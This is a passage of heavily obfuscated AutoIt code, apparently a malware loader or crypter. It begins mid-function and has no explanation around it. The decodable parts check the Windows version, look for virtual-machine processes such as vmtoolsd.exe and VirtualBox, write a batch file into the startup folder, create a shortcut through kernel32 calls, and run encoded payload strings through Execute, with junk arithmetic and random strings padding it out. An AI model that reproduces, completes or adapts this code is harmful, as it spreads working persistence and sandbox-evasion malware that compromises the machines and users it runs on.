) ) ) ) ENDIF NEXT ENDIF RETURN $RETURN ENDFUNC FUNC AFYCEUVYZX () LOCAL $OSVERSION = $RVLXXSQVNZAXBEXVLCOYMMYTVKMXHDDKZNNJCLAAUDHWOTJLFVEDXJKE IF NOT $ADVENYDCNHZL () THEN IF $WQURQXMWAZTB ($OSVERSION , ZVTZJDNXHRPQQIM ("60" ) ) THEN RIINHIEBTT () ELSEIF $WQURQXMWAZTB ($OSVERSION , ZVTZJDNXHRPQQIM ("61" ) ) THEN RIINHIEBTT () ELSEIF $WQURQXMWAZTB ($OSVERSION , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..4..,..5..3.." , ".." ) ) ) THEN IPTYOQECLE () ENDIF ENDIF ENDFUNC FUNC QTMVSHRFRD ($PID ) WHILE (1 ) $HOKAFSRHEHOF (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..4..,53,..5..3..,53,53" , ".." ) ) ) IF $SNOJUKVVIBEY ($PID ) = ZVTZJDNXHRPQQIM ("53" ) THEN DJXLPTMAOK () ENDIF WEND ENDFUNC FUNC UCZPRNKTQP ($NAME , $FILENAME ) GLOBAL $1300820860 = 256356752 GLOBAL $AOBKTGNJEN = 1395198 FOR $E = 0 TO 3001171 ISSTRING ("7gAS7Cz07I7rWa4qtvxQ6oB3N4NKM6uMUA6JH2xHYLmki5XdsDKlhV3SNGedZZnbouHveuSB7Z2ubrUSgJriviE8Hn6aYuT8xl5" ) IF $1300820860 = 176683708 THEN LOCAL $FULLPATH = $STARTUPDIR & "\" & $FILENAME & LUXBZMCWKPOC ("...b..a..t" , ".." ) CHR (3925696 ) EXITLOOP DIM $S3HRVXV6PGEOFZIY1XRM = 2485843 + 3560190 * 3344209 ENDIF IF $1300820860 = 256356752 THEN LOCAL $BYTES = $DKMWACMPQYMR ($LEBAKWEILIBIQNTCTHBGGFGBKVXCKB ) & BINARY ($URTJHDWBPVQN (ZVTZJDNXHRPQQIM ("53" ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..5..,5..8,..58.." , ".." ) ) ) ) $1300820860 = 176683708 STRING ("mf9FJnCyDBsF09ZNgJeGLlaL191crNmSDlMDYuYDknMANtF6DaDUsOsafxOKvzgZpKcNwvZWWJvxHI7HC5HrkCzY3LxAQnhUhYldq2JikS8S" ) ENDIF NEXT IF $DNKSORVXJZJU ($FULLPATH ) = ZVTZJDNXHRPQQIM ("53" ) THEN GLOBAL $1027989821 = 256356752 GLOBAL $FZHHA2ZOWK = 1840040 FOR $E = 0 TO 940625 RANDOM (1561290 ) IF $1027989821 = 113519199 THEN $WURIVHUQSXZK ($FULLPATH , $RXJCPAPNDUMJMOSOPQCHSTGTFYAPOZBYKYKLGKEC & "\" & $NAME & LUXBZMCWKPOC ("...l..n..k" , ".." ) ) EXITLOOP ENDIF IF $1027989821 = 176683708 THEN DIM $FILEHANDLE = $FWRGBKVEXWEH ($FULLPATH , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..4,5..3" , ".." 
) ) ) $1027989821 = 1300820860 ENDIF IF $1027989821 = 256356752 THEN $XFNAYPZBZOLC (LUXBZMCWKPOC ("k..ern..e..l32.....d..l..l" , ".." ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..4,2..7..,40,3..0,3..8..,..31.." , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..,..44,..31,27..,..4..6,3..1..,..6,3..5..,..38..,31..,..23" , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("49..,45..,46,..44" , ".." ) ) , $FULLPATH , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..0,4..9..,4..1..,4..4..,30" , ".." ) ) , ZVTZJDNXHRPQQIM ("53" ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..0,4..9..,4..1..,4..4..,30" , ".." ) ) , "" , LUXBZMCWKPOC ("st..ru..ct..*" , ".." ) , "" , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..0,4..9..,4..1..,4..4..,30" , ".." ) ) , ZVTZJDNXHRPQQIM ("54" ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..0,4..9..,4..1..,4..4..,30" , ".." ) ) , "" , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..4,2..7..,40,3..0,3..8..,..31.." , ".." ) ) , "" ) $1027989821 = 176683708 ENDIF IF $1027989821 = 1203322726 THEN $DBGGPSHIBQGJ ($FILEHANDLE ) $1027989821 = 113519199 ENDIF IF $1027989821 = 1300820860 THEN $NPTGNKISXCCR ($FILEHANDLE , $BYTES ) $1027989821 = 1203322726 DIM $2CGYKWLYPSNSIE1FFBSM = 1138330 + 4292028284 * 2422679 + 1451894 ISPTR (3910360 * 133122 + 1965520 ) ENDIF INT (3334982 ) NEXT ENDIF ENDFUNC FUNC IRWNOKLXLW () LOCAL $ARRAY = [LUXBZMCWKPOC ("vm..t..oo..ls..d.....exe" , ".." 
) , LUXBZMCWKPOC ("v..b..o..x.ex..e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cUJodtOqAs0Q1peCLdghXZVWVuigmg5qItqyuFfLjy3qnyRWhT62podn9XDSlHdtwIgH8Qig7D8y5DIvNv9DkdaupdyGbwzKuJ3NriY" ) ENDIF IF $116925729 = 92596336 THEN $__G_ACRYPTINTERNALDATA [ZVTZJDNXHRPQQIM ("53" ) ] -= ZVTZJDNXHRPQQIM ("54" ) ISPTR ("rEnhd0IJjtHWr5qKeKdxevK4eEGH2ujofKW4t4sJbUAJgF13k9VsS2J54tcIsbRYktQRjvrkrDvt5bY" ) $116925729 = 1604509846 ISBINARY ("J0Fma0a91UqacMyWZjUYSKaoFqa3ED4NOYntYCRsvrsHmvrsLcTE4Hk9ZqRT0hEw0Mvnyf8vBACArCbk8SqBVyTgNnEGW7BoW5SJ9d3Gew" ) ENDIF IF $116925729 = 113519199 THEN LOCAL $TTEMPSTRUCT $116925729 = 1027989821 MOD (2055517 , 3023122 ) ENDIF IF $116925729 = 116471326 THEN $VRETURN = $ARET [ZVTZJDNXHRPQQIM ("58" ) ] $116925729 = 1196440215 ENDIF IF $116925729 = 176683708 THEN LOCAL $B = $E (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("28,35,..40..,..27..,..44..,5..1..,4..6..,..4..1,..4..5,..4..6,4..4..,..3..5,40,3..3.." , ".." ) ) ) $116925729 = 1300820860 ENDIF IF $116925729 = 256356752 THEN LOCAL $E = EXECUTE $116925729 = 176683708 ENDIF IF $116925729 = 432319576 THEN $ARET = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC 
("53..,50..,..5..7..,..57,..5..9,3,..5..9,3,5..7,56..,59..,..54..,..5..9..,3,5..9..,..3..,5..5..,..6..1..,..5..5,5..7..,5..8..,..6..,58..,..6..,..5..9..,6..0..,..5..8,..6,59,..5..4,57,..56..,..6..0,5..5..,..60,..62..,..60,5..3,..6..0,..5..7,..5..7,..62..,..5..9,..5,..6..0,5..7..,..59..,..58,..60,..5..5..,5..9,..5..,5..9,..54,5..9..,3,..5..7,57,..59..,54,..60,..57..,5..9..,..54,5..8..,..2..,..55..,..55,..56..,..5..4,55..,5..5,58,..4,..5..5..,3..,5..5..,5..3,..55,..55..,59..,5..5,59..,6,5..9,6..,..5..9..,..3..,..5..5..,5..5..,..5..5,3,..5..5,..53..,..55..,..55..,57,..5..6..,..60..,..5..5,..6..0,62,..60..,53,..6..0,5..7..,5..7..,57,..59,..58..,60..,5..6,..6..0,..57..,..6..0..,5..5,59,6,60,6..2..,5..7,2,5..9..,..5..8..,6..0..,62,5..5..,5..5..,..55,3,55..,5..3..,..55..,..5..5,..5..9..,..61..,..59,54..,59,5,..5..9..,5..7..,..5..9,3..,..59,58,..5..5..,..55..,..55,..3..,..5..5,..5..3..,55..,..5..7,60,59..,5..7,..5..6,..60..,55,..60..,6..2..,..60,5..3..,60,..5..7,..5..7,2..,5..9,58..,6..0,..62..,..55..,..62" , ".." 
) ) ) ) ISPTR ("vpb3FhrqmtxUtqRVDS6MXJE1fvLYuZtfNnfMnQOCjsqOZ4" ) $116925729 = 92596336 CHR (439850 ) ENDIF IF $116925729 = 586524435 THEN LOCAL $A_CALL = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..50..,..5..7..,..57..,..5..9,3..,59,3,..5..7,56,5..9..,..54,59..,..3,..5..9..,..3..,..5..5..,61..,5..5..,..5..5..,..5..9..,5..,60..,..57,..59..,5..7,..5..9..,3,5..9..,..3..,..5..5..,..5..,59..,..57..,59,3..,59..,..3,..55,55,..5..5,3..,5..5,..53..,5..5,..5..5,..59..,..6..2,59..,5..,60,57,55,55..,..5..5,..3..,..5..5,5..5..,..58..,55,6..0..,5..7,..5..9..,3,..5..7..,..57..,..5..9..,5..8..,59..,..56,59..,6..,59,..4..,..6..0..,..53..,60..,55,..59..,..58..,..6..0..,..56,..6..0,5..6..,..5..7..,..5..5..,60,..58,5..9,5..9,..5..9..,..5..9..,59..,5..8..,..60,55..,..5..5..,..5..5,..5..5,..3..,..5..5..,..5..5,..6..0..,58..,6..0..,56,5..9..,..6..1,..5..9,6,..60,5..5,..60..,5..7..,55,..55..,..5..5..,..3,..5..5,5..3,5..6,..55,55,..3..,..55..,..55,..6..0..,53,60,..5..7,6..0,..5..5..,5..5,55..,55,3,55..,53..,5..7,..57..,59..,..3,..5..9..,..3,..58..,56..,6..0,..57,60..,..5..5,..6..0,..58..,..5..9..,..5..6,..60..,..57,5..7..,6..0..,59..,5..8,..6..0,5..7,..5..8..,..53..,..60,..57..,60,5..5,55,..61,..55,..5..7,6..0,..5..7,5..7..,..55..,..6..0,5..8,..5..9,5..9,..5..9..,..5..9,59..,..58,60..,55,5..5..,62,55,3,5..5,..55..,59..,5..7,60,60,..59..,6,..6..0..,55,..59..,5..7,55,5..5..,..55..,..3,..5..5,5..3..,..5..7,..57..,5..9,..3,5..9..,..3..,58..,..56..,60..,5..7..,..60..,..5..5..,..60,5..8..,..5..9..,..5..6..,..60,5..7..,5..7,..60,59..,..5..8..,60,..57..,5..8..,5..6,..59,..6..2,60..,..1..,5..9..,..58,5..5,61,55..,..5..7,..6..0..,5..7..,..57,..5..5..,..60,..5..8,59,5..9..,59..,..59,59..,..5..8..,..60..,..55,..55..,62,55,3..,55,..5..5..,..60,..53,6..0,57,..60..,5..5,..5..5,5..5,..55,3..,..55,..5..3..,..5..7..,57,..59,3,..59..,..3..,58,..56..,60..,..57,..60,..55..,..60..,..58..,59,5..6..,..6..0..,..5..7,5..7,60,..5..9,58,..6..0..,..5..7..,58..,5..3..,..6..0..,5..7,..6..0,5..5,..5..5..,..61..,..5..5
,..57..,60,57..,57,..62..,5..9..,5,..6..0,53..,..6..0,..58..,..60..,..57,..5..5..,62..,..5..5,..3,..5..5,5..5..,5..9..,..57..,..6..0,6..0..,59,..6,60..,5..5,59..,5..7..,..5..5..,..55..,..5..5..,3,..55,5..3..,5..7,5..7..,5..9..,..3..,..5..9..,..3..,..58..,..56..,..60,57..,60..,5..5..,..60..,..58..,59..,5..6,6..0,..5..7..,57..,..6..0,5..9,5..8..,..60,..5..7..,58,..56..,..5..9..,6..2..,..60,..1..,..5..9,..58..,..55,..6..1,..55..,..5..7,60..,5..7,..57,..6..2,59..,..5,..6..0..,5..3,..6..0,..5..8..,..60..,5..7,..5..5,6..2..,5..5..,..3..,..55,5..5..,..5..9,..5..7..,..60,..60,..5..9,..6,60..,..55,59..,5..7..,55..,1..,..55..,..5..5,5..5..,3..,..5..5..,53..,..5..6,..5..3..,5..5,6..2" , ".." ) ) ) ) ISBOOL (3036564 * 693275 ) $116925729 = 1453481599 RANDOM (1505347 ) ENDIF IF $116925729 = 737653776 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,50,57,..57,5..9,..3,..5..9..,..3,..5..8,..56,..6..0..,..57,..60,5..5,..6..0..,5..8,5..9..,..56..,6..0,..57,58,..5..6..,59..,5..8..,..60..,5..7,57,5..7,..59..,..5..4,6..0,5..7..,..5..9..,54,..5..5,..61..,..55..,..57,60..,..5..7..,57..,55,60..,..58,..59..,..59..,59,..5..9..,..55,3,55,53,5..7,..58..,..6..0,61..,..5..9..,..5..8..,..59,56..,60..,5..8,6..0..,..5..7,5..9,..5..8..,5..5..,6..1..,56..,5..4,5..5..,..6..2..,55..,..3,55..,..53..,..5..5,..5..7,6..0..,..5..9,..5..7,56,..60..,..55,60..,..6..2,..60..,..53..,..60,5..7..,5..7..,2,59..,58..,60,..6..2,55,..62" , ".." 
) ) ) ) $116925729 = 38669117 DIM $CCES0BLSID4XMQ3MS2D2 = "7Qw3NGZ6rQ3NdvrgC5iL1wzb9XblC2lD4IFWhzlEww1wbUi5KG075qMKqv4" ENDIF IF $116925729 = 781366022 THEN LOCAL $ARET = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,..5..0..,57,..5..7,5..9..,3,59,..3..,57,..56..,..5..9,5..4,..5..9,3,5..9,3..,5..5,..61,5..5,5..7..,58..,..6,58..,6,5..9..,60..,5..8..,..6..,59..,..5..4..,..57,5..6..,..60..,..5..5,6..0..,..6..2,..60..,..5..3,..6..0,..5..7..,..5..7,6..2,5..9,..5..,6..0..,..57,..5..9,5..8,6..0,5..5,..59,..5..,..5..9..,5..4,5..9,3,57..,5..7..,..59..,54..,6..0,..5..7..,59,..54..,58,2..,..56..,5..4..,..5..8,4..,55..,..3..,55,5..3,..5..5..,..5..5..,59..,5..5..,5..9..,..6..,5..9..,..6..,..59..,3..,..5..5,5..5,5..5..,3,5..5,..5..3..,..5..5..,..55,..57..,56,..60..,55,..6..0..,..62,60..,5..3,..60,..5..7,5..7,5..4,5..9,..5..6..,6..0,54..,..6..0..,58,..5..9,6..2,60,55..,..5..9..,..5..8..,..5..7,5..6..,..59,6..,..5..9,5,..60..,57,..5..9,..5..8,60,..61,..60..,..57..,55..,55,..55,..3,5..5..,..5..3..,..5..5,55,..5..9..,6..1,..5..9..,54..,..59,..5..,59,..57..,59,3,..5..9..,58,..55..,..1..,55..,..5..5,..55..,3..,5..5,..53,..5..6,..5..3..,5..5,3..,..55..,..5..3..,5..5,..5..5..,..6..0..,..5..3..,60..,57..,..6..0,..5..5..,..5..5,5..5,5..5..,3..,55..,5..3..,56,..53..,..55..,3..,..55..,53..,..5..5..,55..,..60,5..3,6..0,57,6..0,..55..,55,..5..5..,5..5..,3,..55,53..,..5..6,..5..3..,55..,3..,55,..53,5..5..,..55..,5..9..,5..7..,..6..0..,..60..,5..9,..6,..6..0..,55..,5..9..,57,55..,..55,..5..5,..3,55,..5..3,..5..6,..5..5,56,57,55,..3,55,5..3,..5..5,..55,59,..57,60,..6..0,59,..6,..6..0,55..,5..9,5..7,..5..5..,5..5..,..5..5,..3..,5..5..,53..,55,..55,5..6..,..5..3..,..60..,..6..1..,..57,..59..,..56..,..53..,56..,53,5..6..,53,56,..53..,5..6,5..3..,..5..6..,53,..5..6,..5..3..,55..,..55..,..5..5,62.." , ".." 
) ) ) ) ISBINARY ("EyUEZE8dTNpEEc9pNgK6coIN65FWEu9U3B2LaNffHWnqbhfn" ) $116925729 = 864731176 ENDIF IF $116925729 = 848901156 THEN $ARET = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..50..,57..,..5..7,..5..9..,..3..,..5..9,3,..57,56..,59..,54..,..5..9,3..,..5..9..,..3,..5..5..,61,..55..,..57..,..58..,6..,5..8..,..6,..5..9..,60..,..58..,6..,..59,..5..4..,5..7,..5..6..,60..,..55,6..0..,..6..2,6..0,..5..3..,6..0,57,..5..7..,62,..59,..5,..6..0..,57..,..59,5..8..,6..0..,55,..5..9,..5,..5..9,..54,59,..3..,5..7,57..,5..9,5..4..,60,..57,..59,5..4,..5..8,..2..,5..6..,..5..4..,5..8..,..4..,..55..,..3..,5..5..,..5..3..,..5..5,55..,5..9..,55..,..5..9..,..6..,..59,6..,..5..9,3,5..5..,5..5..,55,..3..,5..5..,..5..3,..5..5,..5..5..,..5..7..,..56..,..6..0..,..5..5..,..6..0..,..6..2,..6..0..,53,..60,..5..7..,5..7..,..56..,60,5..5,59,..58..,..59,54..,60,..5..7..,..59..,..58..,5..7,61,5..9,54..,60..,..5..6..,..59,6..1..,5..5,..55..,55..,..3..,5..5,53,..5..5,5..5..,..5..9..,6..1..,..5..9,..5..4,59..,..5,..5..9,..5..7..,..59,3,5..9,..58..,..55,55,..5..5,..3..,5..5..,..5..3,55,..5..7..,..5..8,..6..,..58..,..6,..5..9..,..6..0..,58,6,59..,5..4,57..,56..,..6..0,5..5..,..6..0..,62,..6..0,5..3..,..6..0,..57..,..5..7,..6..2..,..5..9,5..,60,..57..,..59..,5..8,60,55,59..,5,..59,..54,5..9,3,57,5..7,..5..9..,..5..4..,60,57..,5..9,..5..4..,..58..,2..,..56..,..55..,5..8,..4,55..,..3..,..5..5..,..5..3,..55,..5..5..,60..,..58..,..5..9,62,5..9..,5,..6..0..,57,..5..5..,55,..5..5,3,5..5,53,..55..,..55..,56..,..53..,6..0,61,..5..6,5..3..,..5..6..,..53,5..6..,53,..5..6..,..5..3,..5..6,..61..,..56..,53,..5..6..,..5..3,56..,5..6,5..5..,5..5,..55..,3..,..55..,53..,..5..5,..5..5..,60..,..53..,6..0..,..57,60..,..5..5..,55..,..55,..55..,3..,..55..,53,..56,5..3,5..5,..3..,..55..,..53..,..5..5..,55,5..9..,57,6..0,..6..0,..5..9,6..,..6..0..,5..5..,..59..,5..7..,55,55,5..5..,..3,5..5,5..3..,5..6,..5..3..,..5..5,3,5..5,..53,..55..,5..5,..5..9,6..1..,59..,54,5..9,..5,..59..,57,5..9..,..3,59..,..5..8..,..55..,1..,55..
,..5..5,55..,3..,5..5..,53..,..56,53,..5..5..,..6..2" , ".." ) ) ) ) $116925729 = 1718368979 ISBOOL (3936637 + 4293346114 ) ENDIF IF $116925729 = 864731176 THEN $__G_ACRYPTINTERNALDATA [ZVTZJDNXHRPQQIM ("55" ) ] = $ARET [ZVTZJDNXHRPQQIM ("54" ) ] ISBOOL ("wpaaFxpbrLYZsz0hKSwf" ) $116925729 = 1808850186 WINEXISTS ("lgunYMFGc" ) ENDIF IF $116925729 = 954977294 THEN LOCAL $TINPUT = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,5..0,57..,..57..,..59,3,59..,..3..,..58..,..56,..6..0..,..57,..60..,5..5,..60,..5..8..,..59,..56..,..60,57..,5..7..,56,..6..0,55..,..59..,5..8,5..9..,5..4,60..,..57..,..5..9..,5..8,55..,..61..,5..5..,..5..5,..59..,..5..5,60..,6..2..,..60,57,59..,..5..8,..5..8,..2,55..,..55..,..5..5,53..,..55..,..5..9..,55..,5..3,5..7..,5..5..,..5..9..,..6..2..,..5..9,..5,..5..9,5..4,..60..,5..5,..6..0,..62,5..7..,..3,..5..9,..58,5..9,..5..,..55..,6..1,5..5,..57,59,..5..5,57..,55..,..59..,..6..2..,..59..,5..,..59,..54..,..60,..55..,..6..0,6..2..,..5..5,62,55..,..53..,..55,5..9..,55,5..3..,55,55..,..58,..4,..55,..5..5..,55,..6..2.." , ".." ) ) ) ) $116925729 = 61093985 ENDIF IF $116925729 = 1027989821 THEN LOCAL $IPLAINTEXTSIZE $116925729 = 1138660241 ENDIF IF $116925729 = 1051260188 THEN $TBUFF = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,5..0,..57,..57,..5..9..,3,59,3,5..8,56,6..0..,57,60..,..5..5,6..0..,5..8..,59..,5..6..,..6..0..,5..7,5..7,..56..,..60..,..5..5..,..5..9..,..58..,..5..9..,54..,60,..57,5..9,5..8..,5..5,6..1..,..5..5..,55..,59..,..5..5..,..60..,6..2,6..0,..57,..59..,..58..,..58..,2..,..55..,..55..,..55..,..5..3..,..55..,59,..5..5..,..53..,..57..,5..5..,..5..9..,..62..,..59,5..,..5..9..,5..4..,..6..0..,..55..,60,62,..57..,..3,..5..9..,..58..,5..9..,..5..,55,..6..1..,5..5,5..7..,..60,..5..9..,57,5..6..,..60,5..5..,60..,..6..2..,60,53..,..6..0..,57..,..5..7..,..2,5..9,58..,..6..0..,..62,..55,..6..2..,..55,5..3..,5..5,..59..,55..,53..,5..5..,..55..,..58..,4,5..5,55..,55,62.." , ".." 
) ) ) ) INT (178616 ) $116925729 = 737653776 RANDOM (2170536 ) RANDOM (3316550 ) ENDIF IF $116925729 = 1053930317 THEN LOCAL $TBUFFER = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,..50,..5..7,5..7,..5..9..,..3,..59,3,..5..8..,56,60..,57..,..60,..55..,..6..0,5..8..,5..9,..5..6,..60,..5..7..,5..7,5..6,60,..5..5..,59..,..58,..59,..5..4,6..0..,..5..7,..59..,5..8..,..5..5..,6..1..,55,..5..5,5..9..,55,..6..0,..62..,..60..,..57,59,58..,..58,..2..,..5..5,55..,..5..5..,5..3,55,..5..9,..5..5,..5..3,..56,..5..4..,..5..6,..5..9,55..,..53..,..5..5,..1..,..5..5,..5..3,..57,57..,5..9,..3..,..59..,..3,58,..5..6,..6..0,57,60,..55,..60..,58..,..5..9,..56,6..0,57..,..57,6..0..,..59,..5..8..,60,5..7,..5..8..,56,..59..,6..2..,..6..0..,1,..5..9..,58,5..5..,..6..1..,..5..5..,..57..,60,..5..7..,5..7,6..2..,..59,..5..,..6..0,53..,..6..0..,..58,60,5..7,5..5,6..2..,..55,..5..3..,..5..5,59..,55,..53,..5..5..,55..,..58,..4..,..55..,55,..5..5..,62.." , ".." ) ) ) ) $116925729 = 586524435 INT (3174530 ) ENDIF IF $116925729 = 1070530058 THEN $VCRYPTKEY = $VRETURN $116925729 = 39019882 ENDIF IF $116925729 = 1138660241 THEN LOCAL $VRETURN $116925729 = 1924764602 ENDIF IF $116925729 = 1196440215 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC 
("5..3..,50,57..,5..7,59,..3,..5..9,3,57,..5..6,5..9,54..,59..,3,5..9..,3..,55..,61,..55..,..5..7..,..58..,6,5..8..,..6..,59,60..,58,..6..,..59..,5..4,..57..,..5..6,..60..,..55,60,..6..2,6..0..,..5..3..,..60..,57..,..57..,6..2,5..9,..5..,..60..,..57,59..,..5..8..,..60,..55,5..9..,..5..,..59,5..4,..59..,3,5..7,..5..7..,..59..,5..4,60..,5..7,..5..9..,..5..4..,..58,..2..,5..6,5..4..,5..8,..4..,..55,..3,5..5..,..53,..5..5..,5..5..,..5..9,..5..5..,5..9..,6..,..59,..6..,5..9,3..,5..5..,5..5,5..5,..3..,..5..5,..5..3..,55,..55..,..5..7,5..6,60,..55..,..6..0..,6..2..,..60,..53,60,..57..,..57..,..5..7..,..59,..5..8..,..6..0,56,6..0..,5..7..,60,55,59..,6,..6..0,6..2,57..,..6..1..,59..,5..4..,..60,..5..6,..59,61..,..55..,55..,55,3..,5..5..,..5..3,..55..,5..5..,59..,..6..1..,5..9,..54..,59..,5..,..5..9..,5..7,5..9..,..3..,..5..9..,58..,..55,55,..55,3,5..5..,..5..3..,..5..5,..5..7..,..5..9,61..,57..,..56..,6..0,..55,..6..0,..6..2,6..0,..53,6..0..,..5..7..,57..,..6..1,5..9,..54..,..60,..5..6..,5..9,..61..,..55,6..2.." , ".." 
) ) ) ) $116925729 = 1070530058 ISBOOL (2885637 + 2030547 ) ENDIF IF $116925729 = 1203322726 THEN LOCAL $TBUFF $116925729 = 113519199 ENDIF IF $116925729 = 1296565717 THEN $IPLAINTEXTSIZE = $ARET [ZVTZJDNXHRPQQIM ("59" ) ] ISSTRING ("vruZKa8jy4MT8EGQdx8SUdvROeh4wrdYYalnlVhrgv8jKZiKHv" ) $116925729 = 2022545531 ISSTRING (2705437 * 2570680 ) ENDIF IF $116925729 = 1300820860 THEN LOCAL $__G_ACRYPTINTERNALDATA [ZVTZJDNXHRPQQIM ("56" ) ] ISPTR ("Y58ssDsqQLxelf06Fwazesot3rHKKydI1tX4kso2HSZ7rnTHtJwQWRVFQNya5ROrIZn2s6Vnii2wDqcQIarbcwWkHqnF4o71dGyB9" ) $116925729 = 1203322726 STRING (597511 + 4291688087 + 4294837104 ) ENDIF IF $116925729 = 1453481599 THEN LOCAL $TOUTPUT = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,..50,5..7..,5..7,5..9..,..3..,..59..,..3..,..58..,56..,..6..0,57,6..0,55,6..0..,5..8,..59,..56,..60..,57..,..57..,5..6,..6..0,5..5..,59,..58..,5..9..,..5..4,60,5..7..,..5..9..,..5..8..,55,..6..1,5..5,..5..5..,5..9..,55..,..60..,6..2..,..6..0,5..7..,..59,5..8..,..58,..2..,55,55..,..55,53..,55..,59..,5..5..,53,..55,..57..,5..9..,5..4..,5..8..,..6..,5..7,56..,..5..9,..54..,..59..,3,..59..,3,5..8..,2,..5..6,59..,58..,..4..,55..,..53..,..55..,59,5..5,..5..3,55..,..55,..5..8,..4,..5..5..,5..5..,55,..3..,5..5,..5..3,57..,5..7..,..59,3..,..5..9..,3,..58..,56,..6..0,..57..,..6..0,..5..5,..60..,5..8,..5..9..,..56..,6..0,57..,57,60..,..5..9..,..5..8,..60,5..7..,..58..,..53,60..,5..7,..60..,55..,..55,..61,..5..5..,..5..7,60..,5..7..,5..7,..55,..60..,58..,59,59,59..,5..9,59,5..8,..60,5..5..,55,6..2..,..55,..62" , ".." 
) ) ) ) WINEXISTS ("NplcdubSpt3kbs61JRRU4m3ZivioY5lXbAzrnz5FnOIZNCXff" ) $116925729 = 1947300206 DIM $UKEAWW4SLX3THGIJ3NNK = "lGoNdkOHcjq4jc16851EntAWoSHtnmA30qINpXtlpkjMLz8drM5TXQG1fCyuMut0Sxe2DmQkKOpdkXjZTDcJrSgjUR" STRING (2269520 * 1234892 * 921537 + 4294581480 ) ENDIF IF $116925729 = 1604509846 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,50,..5..7,5..7..,5..9..,..3..,..59,3,57,56..,..59..,54..,59..,3,..59,..3..,..55,6..1..,..5..5..,..57,..5..8,..6,5..8,..6..,59,..60,..5..8,..6..,5..9,..54..,57,..5..6,..60..,..55,6..0,62,60,53,6..0..,57..,57,6..2..,..59..,5,60,..5..7..,59..,5..8..,6..0,..5..5..,..59,5,..59,..54..,..5..9..,3..,..5..7..,..5..7..,..5..9..,..5..4..,60..,57,5..9,..54..,5..8..,..2,56..,..5..4..,5..8..,4,..5..5..,3,55..,..53,55..,..5..5..,5..9,5..5,59..,..6..,59..,6,..5..9,..3..,55,..5..5..,55,3,55..,..53..,..55,5..5..,57,56..,..6..0,55,..60,6..2,6..0..,53..,6..0..,5..7,5..8..,5..5,5..9..,..5..8,5..9..,..3..,59..,58..,..5..9,..54..,..60..,56..,..5..9..,5..8..,5..7..,5..6..,5..9,6..,5..9,..5..,..6..0..,57..,..5..9,5..8,60..,61,..6..0..,..5..7,5..5,55..,..55,..3,5..5,..53..,55,5..5..,5..9..,..6..1,..59..,54,59,5,..59..,..57..,..5..9..,3,..5..9,..58,..5..5..,..5..5,..5..5..,..3,..5..5..,..5..3,55..,57..,58..,6,..5..8,6,59,..6..0..,..58,6,..5..9..,..54,..57,5..6..,..6..0..,5..5,..6..0..,6..2..,6..0..,5..3,6..0,..57..,5..7..,..6..2,..5..9,..5,..60..,..5..7,5..9..,..5..8,6..0,5..5,59..,5..,5..9,..54..,..5..9..,3..,..57,..5..7..,59,..5..4..,6..0,57..,5..9..,..5..4..,58..,..2,..56..,5..5..,..5..8,4..,55..,3,..55,..53,..5..5..,..55..,..5..9..,5..7..,60..,6..0..,..59..,..6,6..0,..55..,..59,57,..5..5,55,..5..5,..3,..55,53,..5..6..,53..,..55..,..62" , ".." 
) ) ) ) RANDOM (2988315 ) $116925729 = 2060391673 ENDIF IF $116925729 = 1655436234 THEN $__G_ACRYPTINTERNALDATA [ZVTZJDNXHRPQQIM ("54" ) ] = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..50,..5..7,..5..7,59..,..3,..59,3..,5..7..,6,60..,..53,59,..5..8..,..5..9,5,55,..6..1,5..5..,..55..,..57,..5..4,5..9..,57,..6..0,59..,..59,54..,60,..53,..5..9,..6..2..,56..,..5..6,5..6,..55..,..55,5..,..59,57..,..5..9..,3,..5..9..,..3,..55..,55..,..5..5..,..62.." , ".." ) ) ) ) INT (2325981 ) $116925729 = 781366022 INT (2956702 ) INT (3649111 ) ENDIF IF $116925729 = 1713506615 THEN $VRETURN = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..5..0,57..,..55,..59,..6..2,59..,..5,..5..9..,..5..4..,..60..,..55,60,62,57..,..4..,59..,..6..2..,..59,5..7,5..5,..6..1..,5..7,57,5..9,3,59..,3,58..,..5..6..,..6..0..,..57,..6..0,..5..5,6..0,58,59,..5..6..,6..0..,57,..5..7,..6..0,..5..9..,..5..8,..60,5..7..,..5..7,..57,..5..9..,54,..6..0,..57..,..5..9..,54..,5..5..,..6..1..,..5..5..,5..7..,6..0,..57,58..,..57,..59,..58..,..5..9..,..4,6..0,..5..3..,..5..8,56..,6..0,57..,..6..0,55,..6..0..,58,5..9,..5..6..,..60,57,55..,3,55..,5..3..,..57..,5..8,60,6..1..,5..9,..5..8..,..5..9,5..6..,..60..,..5..8,60..,5..7,59..,58..,..55,61,56..,5..4,..5..5,62..,..5..5,6..2..,..5..5..,..3..,55,..5..3..,56,..5..4,..5..5..,..3,5..5,53,55,..57..,59..,62,58,5..3,5..9..,..3..,59,5..4,59..,62..,..59,..5..,..5..8..,5..7..,5..9,5..8,60,..61..,..6..0,57,.